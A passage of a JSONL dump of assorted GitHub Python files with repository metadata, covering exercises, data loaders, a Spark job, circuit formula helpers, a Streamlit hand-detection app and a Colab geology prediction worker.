train=is_train, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n ]),\n )\n\n x = dataset.data.float() / 255.\n y = dataset.targets\n\n if flatten:\n x = x.view(x.size(0), -1)\n\n return x, y\n\n\ndef split_data(x, y, train_ratio=.8):\n train_cnt = int(x.size(0) * train_ratio)\n valid_cnt = x.size(0) - train_cnt\n\n # Shuffle dataset to split into train/valid set.\n indices = torch.randperm(x.size(0))\n x = torch.index_select(\n x,\n dim=0,\n index=indices\n ).split([train_cnt, valid_cnt], dim=0)\n y = torch.index_select(\n y,\n dim=0,\n index=indices\n ).split([train_cnt, valid_cnt], dim=0)\n\n return x, y\n\n\ndef get_hidden_sizes(input_size, output_size, n_layers):\n step_size = int((input_size - output_size) / n_layers)\n\n hidden_sizes = []\n current_size = input_size\n for i in range(n_layers - 1):\n hidden_sizes += [current_size - step_size]\n current_size = hidden_sizes[-1]\n\n return hidden_sizes\n","repo_name":"Daehyun-Bigbread/Deep-Learning-AI-","sub_path":"Deep_learning Kindergarden/16-practical_exercise/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"26088280500","text":"def linear_Search(list1, n, key): \n \n # Searching list1 sequentially \n for i in range(0, n): \n if (list1[i] == key): \n return i \n return -1 \n \n \nlist1=int(input(\"Enter a nos\")) \n#list1 = [1 ,3, 5, 4, 7, 9] \n#key = 7 \nkey=int(input(\"Enter a key value\")) \n \nn = len(list1) \nres = linear_Search(list1, n, key) \nif(res == -1): \n print(\"Element not found\") \nelse: \n print(\"Element found at index: \", res) \n","repo_name":"manishaachar/manishaachar","sub_path":"ADJAVA/Manisha/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21836388559","text":"import sys\nsys.stdin = open('../input.txt', 'r')\n\n\nds = [(1, 1), (1, -1), (-1, -1), (-1, 1)] # 대각선\n\n\ndef is_field(i, j):\n return 0 <= i < N and 0 <= j < N\n\n\ndef gerrymandering(boundary, d1, d2):\n global min_diff\n city_num = [0] * 6\n # 1번 구역\n for r in range(si+d1):\n for c in range(sj+1):\n if (r, c) in boundary: break\n city_num[1] += A[r][c]\n\n # 2번 구역\n for r in range(si+d2+1):\n for c in range(N-1, sj, -1):\n if (r, c) in boundary: break\n city_num[2] += A[r][c]\n\n # 3번 구역\n for r in range(si+d1, N):\n for c in range(sj-d1+d2):\n if (r, c) in boundary: break\n city_num[3] += A[r][c]\n\n # 4번 구역\n for r in range(N-1, si+d2, -1):\n for c in range(N-1, sj-d1+d2-1, -1):\n if (r, c) in boundary: break\n city_num[4] += A[r][c]\n\n city_num[5] = total_num - sum(city_num)\n\n diff = max(city_num) - min(city_num[1:])\n\n print(city_num)\n\n if diff < min_diff:\n min_diff = diff\n\n\ndef set_boundary(i, j, direction, d1, d2):\n boundary.append((i, j))\n if direction == 3 and i + ds[3][0] == si and j + ds[3][1] == sj:\n gerrymandering(boundary, d1, d2)\n else:\n di, dj = ds[direction]\n ni, nj = i + di, j + dj\n if is_field(ni, nj):\n if direction == 1: d1 += 1\n if direction == 0: d2 += 1\n set_boundary(ni, nj, direction, d1, d2)\n if direction != 3: set_boundary(ni, nj, direction+1, d1, d2)\n boundary.pop()\n\n\nN = int(input())\nA = [list(map(int, input().split())) for _ in range(N)]\n# city_num = [0] * 6 # 인구수\ntotal_num = sum(sum(A, []))\nboundary = [] # 경계선\nmin_diff = 1e9\n\nfor i in range(N):\n for j in range(N):\n si, sj = i, j\n set_boundary(i, j, 0, 0, 0)\n\nprint(min_diff)","repo_name":"liza0525/algorithm-study","sub_path":"BOJ/boj_17779_gerrymandering2.py","file_name":"boj_17779_gerrymandering2.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40946517134","text":"r\"\"\"\nModules for computations about slope stability.\n\nEXAMPLES::\n\n\n\n.. TODO::\n - Add examples.\n\"\"\"\n\n# ****************************************************************************\n# Copyright (C) 2021 Benjamin Schmidt \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n# ****************************************************************************\n\n# noinspection PyUnresolvedReferences\nimport sage.all\n# noinspection PyUnresolvedReferences\nfrom sage.functions.other import imag_part, real_part\n# noinspection PyUnresolvedReferences\nfrom sage.symbolic.constants import I\n# noinspection PyUnresolvedReferences\nfrom sage.rings.infinity import infinity\n\n\ndef delta(v, w=None):\n r\"\"\"\n Computes the Bogomolov discriminant :math:`\\Delta(v, w)`.\n\n TESTS::\n\n sage: from stability_conditions import *\n\n sage: v = Element([1, -1, 1/2, 5, 3, 4])\n sage: slope.delta(v, v)\n 0\n sage: slope.delta(v)\n 0\n\n sage: v = Element([1, 0, -10])\n sage: slope.delta(v)\n 20\n\n sage: v = Element([2, -1, -1/2])\n sage: w = Element([1, 1, -1/2])\n sage: slope.delta(v, w)\n 1/2\n\n sage: var('r, c, d', domain = RR)\n (r, c, d)\n sage: v = Element([r, c, d])\n sage: bool(slope.delta(v) == c^2 - 2*r*d)\n True\n \"\"\"\n if w is None:\n return delta(v, v)\n else:\n return v[1]*w[1] - v[0]*w[2] - v[2]*w[0]\n\n\ndef mu(v):\n r\"\"\"\n Computes the Mumford slope of `v`.\n\n TESTS::\n\n sage: from stability_conditions import *\n\n sage: slope.mu(Element([1, -1]))\n -1\n sage: slope.mu(Element([3, -1, -1/2, -1/6]))\n -1/3\n sage: slope.mu(Element([-1, 5]))\n -5\n sage: slope.mu(Element([0, 1]))\n +Infinity\n\n sage: var('r, c', domain = RR)\n (r, c)\n sage: slope.mu(Element([r, c]))\n c/r\n \"\"\"\n central_charge = z(v)\n if imag_part(central_charge) == 0:\n return infinity\n return -real_part(central_charge)/imag_part(central_charge)\n\n\ndef z(v):\n r\"\"\"\n Computes the central charge for slope stability.\n\n TESTS::\n\n sage: from stability_conditions import *\n\n sage: slope.z(Element([4, -2, 3, 4, 8]))\n 4*I + 2\n\n sage: slope.z(Element([0, 4]))\n -4\n\n sage: slope.z(Element([-5, 1/2, 4, 3/2]))\n -5*I - 1/2\n \"\"\"\n return -v[1] + I*v[0]\n","repo_name":"benjaminschmidt/stability_conditions","sub_path":"stability_conditions/slope.py","file_name":"slope.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14667390609","text":"from google.colab import files\r\nfrom .tools import bcolors, Metrics\r\nfrom .loader import CsvLoader, XlsxLoader\r\nfrom .terra import TerraDataset, TerraModelKol, TerraModelKNPEF, TerraModelKNPEF\r\nfrom . import utils\r\nimport pathlib\r\n\r\nclass Worker:\r\n XLSX_EXTENSION = '.xlsx' # Расширение экселек\r\n CSV_EXTENSION = '.csv' # Расширение csv-шек\r\n messages = {\r\n 'unknown_extension': f'{bcolors.FAIL}Неизвестное расширение файла. Требуется {bcolors.BOLD}*.csv{bcolors.ENDC}{bcolors.FAIL} или {bcolors.BOLD}*.xlsx{bcolors.ENDC}',\r\n 'create_x_set': f'{bcolors.OKBLUE}Создание набора данных:{bcolors.ENDC}',\r\n 'done': f'{bcolors.OKGREEN}{bcolors.BOLD}Done{bcolors.ENDC}',\r\n 'kollector_predict': f'{bcolors.OKBLUE}Определение коллекторов:{bcolors.ENDC}', \r\n 'knpef_predict': f'{bcolors.OKBLUE}Определение параметров KNEF и KPEF:{bcolors.ENDC}', \r\n 'visualize': f'{bcolors.OKBLUE}Построение планшета...{bcolors.ENDC}', \r\n 'download': f'{bcolors.OKBLUE}Подготовка результирующего файла:{bcolors.ENDC}',\r\n }\r\n\r\n def __init__(self, filename):\r\n self.loader = None # Загрузчик данных\r\n self.x_set = None\r\n self.fname = filename\r\n self.load_data(filename)\r\n self.create_sets()\r\n\r\n self.result = self.loader.get_dataframe().copy()\r\n self.model80 = TerraModelKol(\r\n filename='geology/models/model_for_80_kollector.h5',\r\n kollector=80)\r\n self.model4 = TerraModelKol(\r\n filename='geology/models/model_for_4_kollector.h5',\r\n kollector=4)\r\n self.kollector_predict()\r\n\r\n self.modelKPEF = TerraModelKNPEF(\r\n model_path='geology/models/model_kpef_w.h5'\r\n )\r\n self.modelKNEF = TerraModelKNPEF(\r\n model_path='geology/models/model_knef_w.h5'\r\n )\r\n self.knpef_predict()\r\n self.download()\r\n\r\n\r\n \r\n def load_data(self, filename):\r\n file_extension = pathlib.Path(filename).suffix # Получение расширение файла\r\n # Создание загрузчика, в зависимости от расширения\r\n if file_extension == self.__class__.XLSX_EXTENSION:\r\n self.loader = XlsxLoader(filename)\r\n elif file_extension == self.__class__.CSV_EXTENSION:\r\n self.loader = CsvLoader(filename)\r\n else:\r\n print(self.__class__.messages['unknown_extension'])\r\n\r\n def create_sets(self):\r\n print(self.__class__.messages['create_x_set'], end=' ')\r\n ds = TerraDataset(self.loader.get_dataframe())\r\n self.x_set = ds.get_x_set()\r\n print(self.__class__.messages['done'])\r\n\r\n def kollector_predict(self):\r\n print(self.__class__.messages['kollector_predict'], end=' ')\r\n pred80 = self.model80.predict(self.x_set)\r\n pred4 = self.model4.predict(self.x_set)\r\n pred80[pred80==0] = pred4[pred80==0]\r\n pred80[pred80==0]=79\r\n self.result['Коллекторы (модель)'] = pred80\r\n print(self.__class__.messages['done'])\r\n\r\n def knpef_predict(self) :\r\n print(self.__class__.messages['knpef_predict'], end=' ')\r\n pred_kpef = self.modelKPEF.predict(self.x_set)\r\n pred_kpef = pred_kpef*2 - 1\r\n pred_kpef[pred_kpef<0]=0\r\n self.result['KPEF (модель)'] = pred_kpef\r\n pred_knef = self.modelKNEF.predict(self.x_set)\r\n pred_knef = pred_knef*2 - 1\r\n pred_knef[pred_knef<0]=0\r\n self.result['KNEF (модель)'] = pred_knef\r\n print(self.__class__.messages['done'])\r\n\r\n def view_result(self, show_accuracy=True):\r\n if show_accuracy:\r\n self.get_accuracy()\r\n display(self.result.head())\r\n print(self.__class__.messages['visualize'], end=' ')\r\n visualizer = utils.Visualizer()\r\n df_view = self.result.copy()\r\n if 'Коллекторы' in df_view.columns:\r\n df_view['Коллекторы'].replace(79, 2, inplace=True)\r\n df_view['Коллекторы'].replace(75, 2, inplace=True)\r\n df_view['Коллекторы (модель)'].replace(79, 2, inplace=True)\r\n visualizer.createtablet(df = df_view, \r\n collector_predict = df_view['Коллекторы (модель)'],\r\n KNEF_predict = df_view['KPEF (модель)'],\r\n KPEF_predict = df_view['KNEF (модель)'])\r\n\r\n def download(self):\r\n print(self.__class__.messages['download'], end=' ')\r\n self.result.to_excel(f'{self.fname.split(\".\")[:-1][0]}_predict.xlsx')\r\n files.download(filename=f'{self.fname.split(\".\")[:-1][0]}_predict.xlsx')\r\n print(self.__class__.messages['done'])\r\n\r\n\r\n def get_accuracy(self):\r\n if 'Коллекторы' in self.result.columns:\r\n self.result['Коллекторы'].replace(2, 79, inplace=True)\r\n Metrics.accuracy(self.result['Коллекторы'].values, self.result['Коллекторы (модель)'].values)\r\n if 'KPEF' in self.result.columns:\r\n Metrics.tpe(self.result['KPEF'].values, self.result['KPEF (модель)'].values, ' KPEF')\r\n if 'KNEF' in self.result.columns:\r\n Metrics.tpe(self.result['KNEF'].values, self.result['KNEF (модель)'].values, ' KNEF')\r\n","repo_name":"gitterra/geology","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30054201301","text":"#Spark_task3_min_temperatures: minimum temperature observed at different\n# weather station in the year 1800\n\nfrom pyspark import SparkConf, SparkContext\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"MinTemperatures\")\nsc = SparkContext(conf = conf)\n\ndef parseLine(line):\n fields = line.split(',')\n stationID = fields[0]\n entryType = fields[2]\n temperature = fields[3]\n return (stationID, entryType, temperature)\n\n#create rdd\nlines = sc.textFile(\"hdfs:///projects/1800.csv\")\n#parse through the file, out put (stationID, entryType, temperature)\nparsedLines = lines.map(parseLine)\n#filter out, only keep entryType with \"TMIN\"\nminTemps = parsedLines.filter(lambda x: \"TMIN\" in x[1])\n#apply a new map(stationID,temperature)\nstationTemps = minTemps.map(lambda x: (x[0], x[2]))\n#find the mininum station temp\nminTemps = stationTemps.reduceByKey(lambda x, y: min(x,y))\n#collect result\nresults = minTemps.collect();\n#iteration, 2 decimal place right of the decimal point\nfor result in results:\n print(result[0] + \"\\t{:.2f}F\".format(result[1]))\n","repo_name":"Alice-yz-Wong/hadoop","sub_path":"Spark/Spark_task3_min_temperatures/min_temperatures.py","file_name":"min_temperatures.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13581827590","text":"import math\nfrom Util import detect_verbose, inv_sum_inv, complex_arithmetic, phasor_arithmetic, phasor_to_rectangular\n\n\n@detect_verbose\ndef R(v: float=None, i: float=None, p: float=None) -> float:\n \"\"\"\n Compute the resistance, given any two of voltage, current, and power\n \"\"\"\n if v is not None and i is not None:\n return v / i\n if v is not None and p is not None: \n return v ** 2 / p\n if i is not None and p is not None: \n return p / (i ** 2)\n return None\n\n\n@detect_verbose\ndef G(v: float=None, i:float=None, p:float=None) -> float:\n \"\"\"\n Compute the conductance, given any two of voltage, current, and power\n \"\"\"\n return 1 / R(v=v, i=i, p=p)\n \n\n@detect_verbose\ndef V(\n r: float=None, \n i: float=None, \n p: float=None, \n c: float=None, \n q: float=None, \n l: float=None, \n di: float=None\n ) -> float:\n \"\"\"\n Compute the voltage, given the parameters\n \"\"\"\n if r is not None and i is not None: \n return r * i\n if r is not None and p is not None: \n return math.sqrt(r * p)\n if i is not None and p is not None: \n return p / (i ** 2)\n if c is not None and q is not None: \n return q / c\n if l is not None and di is not None: \n return l * di\n return None\n\n\n@detect_verbose\ndef I(r: float=None, v: float=None, p: float=None) -> float:\n \"\"\"\n Compute the current, given any two of resistance, voltage, and power\n \"\"\"\n if r is not None and v is not None:\n return v / r\n if v is not None and p is not None:\n return p / v\n if r is not None and p is not None:\n return math.sqrt(p / r)\n return None\n\n\n@detect_verbose\ndef P(r: float=None, v: float=None, i: float=None) -> float:\n \"\"\"\n Compute the power, given any two of resistance, voltage, and current\n \"\"\"\n if r is not None and v is not None:\n return v ** 2 / r\n if v is not None and i is not None:\n return i * v\n if r is not None and i is not None:\n return i ** 2 * r\n return None\n\n\n@detect_verbose\ndef C(v: float=None, q: float=None) -> float:\n \"\"\"\n Compute the capacitance of a linear capacitor, given the voltage and charge\n \"\"\"\n if v is not None and q is not None:\n return q / v\n return None\n\n\n@detect_verbose\ndef Q(v: float=None, c: float=None) -> float:\n \"\"\"\n Compute the charge stored on a linear capacitor, given the voltage and capacitance\n \"\"\"\n if v is not None and c is not None:\n return c * v\n return None\n\n\n@detect_verbose\ndef E(\n c: float=None, \n v: float=None, \n i: float=None,\n p: float=None,\n r: float=None, \n t: float=None, \n l: float=None,\n ) -> float:\n \"\"\"\n Compute the energy, given the parameters \n \"\"\"\n if c is not None and v is not None: \n return 0.5 * c * v ** 2\n if l is not None and i is not None: \n return 0.5 * l * i ** 2\n if p is not None and t is not None: \n return p * t\n if t is not None: \n return t * P(r=r, v=v, i=i)\n return None\n\n\n@detect_verbose\ndef parallel(\n rs: list[float]=None,\n cs: list[float]=None,\n ls: list[float]=None,\n ) -> float:\n \"\"\"\n Compute the equivalent resistance, capacitance, or inductance in parallel\n \"\"\"\n if rs is not None:\n return inv_sum_inv(rs)\n if ls is not None: \n return sum(ls)\n if cs is not None:\n return inv_sum_inv(cs)\n return None\n\n\n@detect_verbose\ndef series(\n rs: list[float]=None,\n cs: list[float]=None,\n ls: list[float]=None,\n ) -> float:\n \"\"\"\n Compute the equivalent resistance, capacitance, or inductance in series \n \"\"\"\n if rs is not None:\n return sum(rs)\n if ls is not None:\n return inv_sum_inv(ls)\n if cs is not None: \n return sum(cs)\n return None\n\n\n@detect_verbose\ndef cseries(zs: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in complex regtangular form of many impedances in series\n \"\"\"\n if zs is None or not len(zs):\n return (0, 0)\n z_sum: tuple[float] = zs[0]\n for z in zs[1:]:\n z_sum = complex_arithmetic(z_sum, \"+\", z)\n return z_sum\n\n\n@detect_verbose\ndef pseries(ps: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in phasor form of many impedances in series \n \"\"\"\n if ps is None or not len(ps):\n return (0, 0)\n p_sum: tuple[float] = ps[0]\n for p in ps[1:]:\n p_sum = phasor_arithmetic(p_sum, \"+\", p)\n return p_sum\n\n\n@detect_verbose\ndef cparallel(zs: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in complex rectangular form of many impedances in parallel \n \"\"\"\n if zs is None or not len(zs):\n return (0, 0)\n inv_sum: tuple[float] = complex_arithmetic((1, 0), \"/\", zs[0])\n for z in zs[1:]:\n inv_curr = complex_arithmetic((1, 0), \"/\", z)\n inv_sum = complex_arithmetic(inv_sum, \"+\", inv_curr)\n return complex_arithmetic((1, 0), \"/\", inv_sum)\n\n\n@detect_verbose\ndef pparallel(ps: list[tuple[float]]=None) -> tuple[float]:\n \"\"\"\n Compute the equivalent impedance in phasor form of many impedances in parallel\n \"\"\"\n if ps is None or not len(ps):\n return (0, 0)\n zs = list(map(phasor_to_rectangular, ps))\n return cparallel(zs)\n\n\n@detect_verbose\ndef Z(r: float=None, l: float=None, c: float=None, w: float=None) -> tuple[float]:\n \"\"\"\n Compute the impedance of a resistor, an inductor, or a capacitor in an AC circuit\n \"\"\"\n if r is not None:\n return (r, 0)\n if l is not None and w is not None:\n return (0, l * w)\n if c is not None and w is not None:\n return (0, - 1 / (c * w))\n return None\n\n\n","repo_name":"neil-zt/eecs-tools","sub_path":"Steady.py","file_name":"Steady.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"38585073616","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\n\n\ndef main():\n window = tk.Tk()\n window.title('Course 10 Exe 2')\n\n # Window Size\n width = 600\n height = 200\n\n # Centering the Window\n left = int((window.winfo_screenwidth() - width) / 2)\n top = int((window.winfo_screenheight() - height) / 2)\n\n # Changing the attributes\n window.geometry(f'{width}x{height}+{left}+{top}')\n window.resizable(0, 0)\n window.attributes('-topmost', 1)\n\n header = ttk.Label(window, text='This is an List Example')\n header.pack(fill='x', padx=5, pady=5)\n\n columns = ('name', 'username', 'email')\n\n elements = [\n ('Elio', 'elio', 'elio@mail.com'),\n ('Day', 'day', 'day@mail.com'),\n ('Eli', 'eli', 'eli@mail.com')\n ]\n\n global elementList\n elementList = ttk.Treeview(\n window, columns=columns, show='headings', height=100, selectmode='browse')\n\n elementList.heading('name', text='Name')\n elementList.heading('username', text='Username')\n elementList.heading('email', text='Email')\n\n for element in elements:\n elementList.insert('', tk.END, values=element)\n\n elementList.bind('<>', showElement)\n\n elementList.pack(padx=5, pady=5)\n\n window.mainloop()\n\n\ndef showElement(event):\n showinfo(\n title='Element',\n message=elementList.item(elementList.selection())['values']\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"perezcasal91/open-bootcamp-course","sub_path":"basic-python/10/course10_2.py","file_name":"course10_2.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30191453233","text":"import cv2\nimport torch\nimport torch.utils.data\nimport torch.optim.lr_scheduler as lr_scheduler\nimport numpy as np\nimport scipy.io as scio\nimport os\nfrom PIL import Image\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\nfrom src import random_erasing\nimport logging\nimport time\nimport datetime\nimport random\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nu0 = 64\nv0 = 64\n\n# DataHyperParms\nTrainImgFrames = 3000\nTestImgFrames = 1000\nkeypointsNumber = 14\ncropWidth = 128 # 176\ncropHeight = 128 # 176\nbatch_size = 64\nlearning_rate = 0.00035\nWeight_Decay = 1e-4\nnepoch = 35\nRegLossFactor = 3\nspatialFactor = 0.5\nRandCropShift = 5\nRandshiftDepth = 1\nRandRotate = 180\nRandScale = (1.0, 0.5)\n# xy_thres = 110\n# depth_thres = 150\n\nrandomseed = 12345\nrandom.seed(randomseed)\nnp.random.seed(randomseed)\ntorch.manual_seed(randomseed)\n\nsave_dir = './result/NYU_batch_64_12345'\n\ntry:\n os.makedirs(save_dir)\nexcept OSError:\n pass\n\n\n\njoint_id_to_name = {\n 0: 'pinky tip',\n 1: 'pinky mid',\n 2: 'ring tip',\n 3: 'ring mid',\n 4: 'middle tip',\n 5: 'middle mid',\n 6: 'index tip',\n 7: 'index mid',\n 8: 'thumb tip',\n 9: 'thumb mid',\n 10: 'thumb root',\n 11: 'wrist back',\n 12: 'wrist',\n 13: 'palm',\n}\n\n\ndef transform(img, label, matrix):\n '''\n img: [H, W] label, [N,2]\n '''\n img_out = cv2.warpAffine(img ,matrix ,(cropWidth ,cropHeight))\n label_out = np.ones((keypointsNumber, 3))\n label_out[: ,:2] = label[: ,:2].copy()\n label_out = np.matmul(matrix, label_out.transpose())\n label_out = label_out.transpose()\n\n return img_out, label_out\n\n\ndef dataPreprocess(data, label, augment=True):\n\n # if augment:\n # imgResize, label_xy = transform(imgResize, label_xy, matrix) ## rotation, scale\n if random.random()<0.5:\n data = data[:, ::-1] # [H,W]\n label[1] = -label[1]\n\n return data, label\n\n\nclass my_dataloader(torch.utils.data.Dataset):\n\n def __init__(self, FileDir, mode=\"train\", augment=True):\n self.FileDir = FileDir\n self.depths = np.load(FileDir+\"/depth_{}.npy\".format(mode)) # [N,W,H]\n # self.depths = np.transpose(self.depths,(0,2,1)) # [N,H,W]\n self.labels = np.load(FileDir+\"/label_{}.npy\".format(mode))\n self.mode = mode\n self.augment = augment\n # self.randomErase = random_erasing.RandomErasing(probability=0.5, sl=0.02, sh=0.4, r1=0.3, mean=[0])\n\n def __getitem__(self, index):\n\n depth = self.depths[index, :, :] # [128,128]\n label = self.labels[index, :] # [42]\n label = label.reshape((14,3))\n # data, label = dataPreprocess(depth, label, self.augment)\n\n depth = depth[None] # [1,128,128]\n # if self.augment:\n # depth = self.randomErase(depth)\n return torch.Tensor(depth), torch.Tensor(label)\n\n def __len__(self):\n return self.depths.shape[0]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Zyyxsth/A2J","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26597153246","text":"import cv2\nimport numpy as np\nimport mediapipe as mp\nimport streamlit as st\nfrom streamlit_webrtc import webrtc_streamer, WebRtcMode, RTCConfiguration\nimport time\nimport av\n\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\nhands = mp_hands.Hands(\n model_complexity=1,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5\n)\n\n\ndef process(image):\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results = hands.process(image)\n\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n return cv2.flip(image, 1)\n\nRTC_CONFIGURATION = RTCConfiguration(\n {\"iceServers\": [{\"urls\": [\"stun:stun.l.google.com:19302\"]}]}\n)\n\n\nclass VideoProcessor:\n\n\n x = [300, 245, 200, 170, 145, 130, 112, 103, 93, 87, 80, 75, 70, 67, 62, 59, 57]\n y = [20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]\n coff = np.polyfit(x, y, 2) # y = Ax^2 + Bx + C\n pTime = 0\n cTime = 0\n\n def recv(self, frame):\n\n img = frame.to_ndarray(format=\"bgr24\")\n\n img = process(img)\n \n # FPS\n \n self.cTime = time.time()\n fps = 1 / (self.cTime - self.pTime)\n self.pTime = self.cTime\n cv2.putText(img, f'FPS: {int(fps)}', (40, 50), cv2.FONT_HERSHEY_COMPLEX,\n 1, (255, 0, 0), 3)\n\n\n return av.VideoFrame.from_ndarray(img, format=\"bgr24\")\n\ndef main():\n # Face Analysis Application #\n st.title(\"Gesture Volume Control using Hand Detection\")\n activiteis = [\"Home\", \"Webcam Face Detection\"]\n choice = st.sidebar.selectbox(\"Select Activity\", activiteis)\n st.sidebar.markdown(\n \"\"\" Developed by \n\n Group Members:\n Saurabh_Keskar\n Sahil Bhawani\n Ajay Mahajan\n Sushant Gawade\n \"\"\")\n if choice == \"Home\":\n html_temp_home1 = \"\"\"
\n

\n The hand detected from video stream is used to control volume of device in real time using OpenCV , MediaPipe and PyCaw Libraries

\n
\n
\"\"\"\n st.markdown(html_temp_home1, unsafe_allow_html=True)\n st.write(\"\"\"\n The application has two functionalities.\n\n 1. Real time Hand Detection using web cam feed\n\n 2. Measure hand distance and control volume using nearest hand\n\n \"\"\")\n elif choice == \"Webcam Face Detection\":\n st.header(\"Webcam Live Feed\")\n st.write(\"Click on start to use webcam and detect your face emotion\")\n webrtc_streamer(\n key=\"WYH\",\n mode=WebRtcMode.SENDRECV,\n rtc_configuration=RTC_CONFIGURATION,\n media_stream_constraints={\"video\": True, \"audio\": False},\n video_processor_factory=VideoProcessor,\n async_processing=True,\n )\n\n else:\n pass\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"skkeskar2000/cv_project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73996724989","text":"from datasets import load_dataset\nfrom transformers import AutoTokenizer\n\n# Load data\nraw_dataset = load_dataset(\"royal42/lichess_elite_games\")\n\n# Load pretrained tokenizer\ntokenizer = AutoTokenizer.from_pretrained(\"royal42/chess_tokenizer\", use_fast=True) \n\n# Tokenize all of the data, this will take a bit unless its cached.\ncontext_length = 256\n\ndef tokenize(element):\n outputs = tokenizer(\n element[\"text\"],\n max_length=context_length,\n truncation=True\n )\n return outputs\n\n\ntokenized_datasets = raw_dataset.map(\n tokenize, batched=True, remove_columns=raw_dataset[\"train\"].column_names\n)\n\ntokenized_datasets.save_to_disk('./data/tokenized_files')","repo_name":"JayOrten/transformer_chess","sub_path":"main/scripts/tokenize_data.py","file_name":"tokenize_data.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23849974605","text":"\"\"\" Viết chương trình Python kiểm tra số nguyên nhập vào là\n- số dương chẵn\n- số dương lẻ\n- số âm chẵn\n- số âm lẻ \"\"\"\n\n\nnum = int(input(\"Nhap vao so nguyen: \"))\n\nif num == 0:\n print(\"So khong\")\nelse:\n s = 'duong'\n\n if num < 0:\n s = 'am'\n\n s1 = 'chan'\n if num % 2 != 0:\n s1 = 'le'\n\n print(f\"So {s} {s1}\")\n\n\n\n","repo_name":"Sangoxyz/tnt","sub_path":"Exepy/exe10.py","file_name":"exe10.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7191826855","text":"def hw1():\n for i in range(9, 0, -1):\n print(\"*\"*i)\n\n\ndef hw2():\n for i in range(10):\n print(\"2 x {} = {}\".format(i, 2*i))\n\n\ndef hw3():\n sum_i = 0\n i = 1\n while i <= 1000:\n if(i % 3):\n sum_i += i\n i += 1\n print(sum_i)\n\n\ndef hw4():\n mutsa_scores = [90, 77, 40, 55, 90, 100, 88]\n avg_mutsa = 0\n for i in mutsa_scores:\n avg_mutsa += i\n print(avg_mutsa/len(mutsa_scores))\n\n\ndef hw5():\n print(\"전화번호 받기 : \", end='')\n phone_number = ''.join(str(input()).replace(\" \", \"\").replace(\",\", \"\").replace(\".\", \"\").split(\"-\"))\n print(\"전화번호 출력 :\", phone_number)\n print(\"영어 이름 받기 : \", end='')\n first_name, last_name = map(str, input().split())\n print(f'first name : {first_name.title()}, last_name : {last_name.title()}')\n\n\nfor i in range(1, 10):\n for j in range(1, 10):\n print(\"{} x {} = {}\".format(i, j, i*j))\n","repo_name":"dooking/LikeLion","sub_path":"session4/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74766213628","text":"\"\"\"Return count number of prime numbers, starting at 2.\n\nFor example::\n\n >>> primes(0)\n []\n\n >>> primes(1)\n [2]\n\n >>> primes(5)\n [2, 3, 5, 7, 11]\n\n\"\"\"\n\n\ndef primes(num_primes):\n 